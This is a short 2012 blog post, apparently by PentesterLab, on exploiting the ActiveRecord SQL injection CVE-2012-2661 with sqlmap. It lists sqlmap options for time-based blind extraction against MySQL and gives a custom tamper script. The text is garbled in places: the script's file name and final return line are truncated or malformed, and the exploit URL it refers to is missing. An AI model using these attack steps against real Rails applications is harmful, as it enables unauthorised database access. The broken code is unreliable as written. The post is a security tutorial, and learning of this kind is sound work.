Monday, 18 June 2012

CVE-2012-2661 exploitation with sqlmap

First to understand this bug exploitation, you should probably read my first article CVE-2012-2661: exploitation write-up

After some work, I managed to get the ActiveRecord bug to work with sqlmap...

First some notes on sqlmap:

  • I'm pretty disappointed by how the tamper scripts works, it will be nicer to have access to the full HTTP request instead of just the payload... maybe a patch to submit. If I had full access to the HTTP request, I'd have been able to do a full rewrite from id=1 to the right payload... anyway 
  • It's really time consuming to do time based exploitation since sqlmap doesn't try to go under 1 second for the sleep()...

So first some options I'm using:
  • --tamper tamper/ : My tampering script, see below
  • --dbms=Mysql : The back-end is Mysql, no time wasted on other checks
  • --technique=T : Time based exploitation only,  no time wasted on other checks
  • --batch : I don't want to answer questions... 
  • --proxy= : Always use a proxy for debugging purpose
  • --banner: I just want to dump the version

The tampering script is pretty simple to write:
  • You need to make sure the request is unique: I'm using the current time, random isn't unique, time is ;)
  • You need to take care of the encoding when using tamper script

And the source code of the tamper script is:
% cat tamper/
#!/usr/bin/env python

Copyright (c) 2012 pentesterlab (

from lib.core.enums import PRIORITY
from datetime import datetime
import urllib 

__priority__ = PRIORITY.LOW

def tamper(payload):
    retVal = payload
    # that's disgusting, encoding =,+,>
    retVal = retVal.replace("=","%3d")
    retVal = retVal.replace("+","%2b")
    retVal = retVal.replace(">","%3e")
    # make the request unique
    return retVal+"/*"+str("*/"

Now, you just need to find the correct URL... and that's the hard part. After a lot of testing, the following URL works: 


Now you're able to test and exploit this bug using sqlmap...

If you want to have a real understanding of the vulnerability and not just ./hack ... You should check out PentesterLab's free exercise on this bug:  CVE-2012-2661: ActiveRecord SQL injection

No comments: